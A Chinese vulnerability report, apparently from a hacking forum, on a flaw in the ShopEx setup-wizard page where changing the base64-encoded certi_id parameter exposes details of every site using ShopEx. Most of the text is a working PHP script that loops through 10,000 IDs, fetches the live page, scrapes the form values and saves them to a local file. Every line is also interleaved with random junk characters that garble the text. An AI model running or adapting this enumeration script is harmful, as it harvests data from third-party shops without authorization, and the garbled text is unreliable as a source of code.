|
|
简要描述:4 ~% s9 i9 l' [! c; T9 h6 ^) P
ShopEx某接口缺陷,可遍历所有网站: b+ p& J& g* d+ ~* v4 ]& ?
详细说明:
) U; x1 C' x$ P/ Z; O# H$ s8 V问题出现在shopex 网店使用向导页面 3 R3 h4 U6 g6 T! D7 W& u/ L! g. ^9 M
2 L/ D- x# q ]) ~7 i0 x+ s. [
* g3 \% o5 s7 a2 l! L8 T' X% D5 {http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
9 a6 _6 |& G0 A D" {) j7 M7 p. n; ]1 S0 o+ i- @ Q/ g; N6 W
- R! S2 _: V! V* M1 U0 J
* ^/ n6 |9 r T/ @1 u0 B: |! X9 c
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}$ w8 D. Y$ n0 G; S) W* j* b
- S: N8 H) c8 Q9 Q
+ p/ B U+ |- U1 j; K; ^
0 k- q r6 t! ^9 l9 x
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 2 ^ D7 E2 ~7 @8 U* Q7 f
. [6 Q3 b+ `' J- ]( F
, d6 t. E* S z/ m" ?$ J4 d% a2 }) D6 p! ~6 r
<?php
; Y: a6 N8 @ C: k3 m' P$ U* E; N z# \1 v
for ($i=1; $i < 10000; $i++) { //遍历
1 [7 v5 W! H" |; M# S1 M# b# k- k# F2 H3 x( q+ @- [
ShowshopExD($i);% e3 S. V* w. G
) Q. l% [3 X) t% ^, p }& I) x9 I3 e7 i, ?7 s+ H- @; j" ]1 R, X
' Y3 h( T; I. R0 d1 j function ShowshopExD($cid) {
( F0 v% a( Q5 |
4 G' }( N: g) N8 S $url='http://guide.ecos.shopex.cn/step2.php';: Y, d! f" i$ q; K; Y1 @0 _
- B4 k% U& u* R9 c$ r4 B3 E $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');8 W# B, X1 ?: }" {8 F
0 R$ z* e. q# |+ Z' {, s
$url = $url.'?refer='.$refer;1 w/ d) l( d4 Y7 j# `
6 a# H4 u' L: |" J) k+ x( r" \
$ch = curl_init($url);) l6 a+ C: v q: E* u7 Q. N
% e0 N9 l# F# n W3 |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;1 V- R2 G% }& l5 q) M. n0 `
3 @0 k1 y# N) R% l# b) u) P curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;3 t+ g9 N4 v0 {1 Q$ Y
/ r( p( O9 r9 M
$result = curl_exec($ch);
$ l$ w" V5 f9 Z3 _7 T2 X1 p4 m" Q$ A1 x) q
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
; E4 d" O h9 k8 s* G1 K/ \% ?' y. L; W* D8 N
if(strpos($result,$refer))
! @5 ?. e7 G5 m
+ _* ~0 d: h2 x$ E3 D {" m9 `5 f. [4 V) o
% U. t; J" y# C $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
8 m! E8 K/ p# N, g, ^7 h* ]: S \ r# o+ j4 h0 y" f& m
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
$ a& g* l) Z% |, E
5 k) e" [( ]8 W foreach ($value[1] as $key) {
2 I! t4 l% {' ^$ h4 G3 i+ K- U! _- X8 ~! t+ }+ P
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
9 V# Y2 T" Z6 ]5 Z! z$ j1 }! d" n4 i; I+ W0 X+ s3 o f% l
echo $res[1][0].':'.$res[3][0]."\r\n";' n1 [9 C: o+ b$ A; T
! ^7 y) h* I: m' m1 }, Y, d $col =$res[1][0].':'.$res[3][0]."\r\n"; ( i7 K+ z4 I; x* m% q+ n9 n/ s6 r5 b
. U" u" w6 c+ ?$ s- ~9 d fwrite($fp, $col, strlen($col));
7 P* ^. w4 B& a3 g; }* a, Y9 v1 v4 x4 W1 A. c/ v: M
}, ?0 c/ e( j @# Z# @6 k/ `+ M3 E* s% F& Z
t& e! M6 w# |6 P8 m- u4 L( v echo '--------------------------------'."\r\n";
4 I+ P0 K9 |0 u5 v/ g; _& o( B, F) M1 W
fclose($fp); 4 b) H% f2 c1 E/ R" y: l9 U* X
4 v: @" ^8 \/ r. l$ O% ~$ t
}2 Z" ^- j: [4 T$ M
* z9 T4 S, ~" ^4 r flush();
0 q, W b x& j# l6 n% v
$ H( f- t0 W" d' d" y% y P curl_close($ch);; {8 r2 Q( z6 O/ H' C& b: r
: R1 u6 F; {" `5 x8 j5 ^$ ~/ i }
1 U; n5 v, M% ?$ ~' q; C7 B
4 J2 O: g0 m9 i7 S) S1 _1 \?># o+ g& Y3 I; V5 I7 w! ~
漏洞证明:
5 b$ }( [, X4 R3 r0 ~+ |! x$ Ohttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg/ M( _8 b: D3 Q& B4 ~2 |/ c( o% X
refer换成其他加密方式
2 w4 H+ {7 u8 r% q3 g4 [: k |
|